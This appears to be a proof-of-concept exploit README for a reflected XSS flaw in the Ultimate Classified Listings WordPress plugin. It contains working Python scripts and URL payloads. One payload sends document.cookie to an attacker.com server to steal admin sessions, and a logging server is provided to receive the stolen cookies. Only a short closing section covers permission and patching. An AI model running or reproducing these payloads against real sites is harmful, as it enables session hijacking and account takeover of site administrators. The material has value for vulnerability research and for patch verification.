## https://sploitus.com/exploit?id=2ADBC468-C996-5226-B82E-32B28EC42B48
# Proof of Concept (PoC) for Vulnerabilities in WordPress Plugins
This repository contains Proof of Concept (PoC) scripts for various vulnerabilities discovered in different WordPress plugins. These scripts demonstrate how attackers can exploit these vulnerabilities to perform malicious actions.
## Table of Contents
- [Vulnerabilities Covered](#vulnerabilities-covered)
- [Setup and Usage](#setup-and-usage)
- [Reflected XSS in Ultimate Classified Listings Plugin](#reflected-xss-in-ultimate-classified-listings-plugin)
- [Stealing Cookies Using XSS](#stealing-cookies-using-xss)
- [Important Considerations](#important-considerations)
## Vulnerabilities Covered
1. **Reflected Cross-Site Scripting (XSS) in Ultimate Classified Listings Plugin**
- A vulnerability in the Ultimate Classified Listings WordPress plugin before version 1.4 allows attackers to execute arbitrary JavaScript by injecting malicious scripts through unsanitized parameters.
2. **Stealing Cookies Using XSS**
- Demonstrates how an attacker can exploit the reflected XSS vulnerability to steal cookies of high-privilege users, such as admins, by sending the cookies to a malicious server.
## Setup and Usage
### Reflected XSS in Ultimate Classified Listings Plugin
This PoC demonstrates how to exploit the reflected XSS vulnerability in the Ultimate Classified Listings plugin.
1. **Identify the Vulnerable Parameter**:
- Assume the vulnerable parameter is `search` in the URL `http://example.com/classifieds`.
2. **Craft a Malicious URL**:
- The malicious URL can include a payload to execute an alert dialog:
```plaintext
http://example.com/classifieds?search=<script>alert('XSS')</script>
```
3. **Run the PoC Script**:
- Save the following script as `xss_poc.py` and run it.
```python
import requests
# Configuration
target_url = "http://example.com/classifieds" # Change this to the target site's URL
payload = "<script>alert('XSS')</script>" # XSS payload
def trigger_xss():
# Construct the malicious URL
malicious_url = f"{target_url}?search={payload}"
# Send a GET request to the malicious URL
response = requests.get(malicious_url)
# Check if the payload is reflected in the response
if payload in response.text:
print("[+] XSS payload reflected in the response.")
print("[+] Malicious URL:", malicious_url)
else:
print("[-] XSS payload not reflected in the response.")
if __name__ == "__main__":
trigger_xss()
```
### Stealing Cookies Using XSS
This PoC demonstrates how an attacker can exploit the reflected XSS vulnerability to steal cookies from high-privilege users.
1. **Setup a Malicious Server**:
- Save the following script as `malicious_server.py` and run it to start a server that logs incoming requests (including cookies).
```python
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.info(f"Received request: {self.headers}")
self.send_response(200)
self.end_headers()
def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
logging.basicConfig(filename='server.log', level=logging.INFO)
server_address = ('', port)
httpd = server_class(server_address, handler_class)
logging.info(f'Starting server on port {port}...')
httpd.serve_forever()
if __name__ == "__main__":
run()
```
2. **Craft a Payload to Steal Cookies**:
- Create a payload that sends the admin's cookies to the malicious server:
```plaintext
http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
```
3. **Run the PoC Script**:
- Save the following script as `steal_cookies_poc.py` and run it.
```python
import requests
# Configuration
target_url = "http://example.com/classifieds" # Change this to the target site's URL
attacker_server = "http://attacker.com:8080" # Change this to your malicious server's URL
payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
def trigger_xss():
# Construct the malicious URL
malicious_url = f"{target_url}?search={payload}"
# Send a GET request to the malicious URL
response = requests.get(malicious_url)
# Check if the payload is reflected in the response
if payload in response.text:
print("[+] XSS payload reflected in the response.")
print("[+] Malicious URL:", malicious_url)
else:
print("[-] XSS payload not reflected in the response.")
if __name__ == "__main__":
trigger_xss()
```
## Important Considerations
- **Permissions**: Ensure you have explicit permission to test these vulnerabilities on the target site. Unauthorized access is illegal and unethical.
- **Testing Environment**: Perform these tests in a controlled environment to avoid impacting production systems.
- **Mitigation**: Update the Ultimate Classified Listings plugin to version 1.4 or later. Always sanitize and escape user inputs before including them in the output.
These PoCs demonstrate how an attacker could exploit vulnerabilities in WordPress plugins to perform malicious actions. Always keep your software up-to-date and follow security best practices to prevent such vulnerabilities.